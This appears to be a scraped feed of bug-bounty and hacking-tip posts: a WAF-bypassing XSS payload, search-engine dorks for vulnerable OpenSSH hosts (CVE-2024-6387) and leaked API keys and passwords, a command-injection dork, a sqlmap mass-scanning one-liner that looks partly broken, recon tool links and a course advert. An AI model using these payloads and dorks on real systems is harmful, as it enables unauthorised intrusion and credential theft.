A payload that bypasses Cloudflare WAF
<img/src=x onError="`${x}`;alert(`Hello`);">
CSPRecon: Discover new target domains using Content Security Policy.
⚠️ This project was created for educational purposes and should not be used in environments without legal authorization.
Download: https://github.com/edoardottt/csprecon
GitHub - v4d1/Dome: Dome - Subdomain Enumeration Tool. Fast and reliable python script that makes active and/or passive scan to obtain subdomains and search for open ports.
⚠️ CVE-2024-6387: Critical OpenSSH Unauthenticated RCE Flaw “regreSSHion” Exposes Millions of Linux Systems
96.4 million+ results found on en.fofa.info within the past year.
FOFA Dork: app="OpenSSH"
Refer: https://lnkd.in/gkENKHPv
ℹ️ POC: https://lnkd.in/gzEWNHAX
#OSINT #FOFA #openssh #bugbounty #bugbountytips #cybersecurity #infosec
List of GitHub Dorks for bug bounties.
Finding target Files, Languages, API Keys, Tokens, Usernames, Passwords, Information using Dates, Extension
#infosec #cybersecurity #hacking #pentesting #security
Who is a good speaker? @Mebledy do you want to live podcast with everyone?
Advanced Web Application Penetration Testing Course - Elevate Your Cybersecurity Skills!
Full Course Curriculum: https://brutsec.com/WebPentesting.pdf
Course Details:
Starting: July 16th, 4PM IST
Duration: 2 Months
Schedule: 3 Days a Week
Format: Online Classes
Languages: Hindi, English, Bengali
Why Enroll?
Gain practical, hands-on experience with a curriculum that covers a wide range of advanced web security topics. Here’s what you’ll learn:
- Reconnaissance Techniques
- Subdomain Enumeration
- Port Scanning
- HTML Injection
- XSS (Cross-Site Scripting)
- SQL Injection
- File Uploading
- CORS Exploitation
- Command Injection
Enroll Now:
Feel free to DM your queries on our WhatsApp: https://wa.me/918945971332
#bugbounty #bugbountytips #cybersecurity
inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example[.]com
subfinder -dL subdomain.txt | grep -Eo 'https?://[^ ]+\?[a-zA-Z0-9_-]+=\d+['"'"'"]?' wayback_urls.txt > potential_sqli.txt && while read url; do sqlmap -u "$url" --batch --level 5 --risk 3 --all --random-agent --time-sec 10 ; done < potential_sqli.txt
CVE-2024-6387 (and probably CVE-2006-5051): Unauthenticated RCE in OpenSSH
The vulnerability, discovered by Qualys researchers, allows an attacker to perform RCE on any OpenSSH server, provided that the operating system contains the glibc library.
Versions 8.5p1 to 9.8p1 are affected, and versions <4.4p are also potentially vulnerable.
Search at Netlas.io:
Link: https://nt.ls/ySN3C
Dork: tag.openssh.version:(>=8.5 AND <9.8) OR tag.openssh.version:(<4.4)
Read more: https://www.qualys.com/regresshion-cve-2024-6387/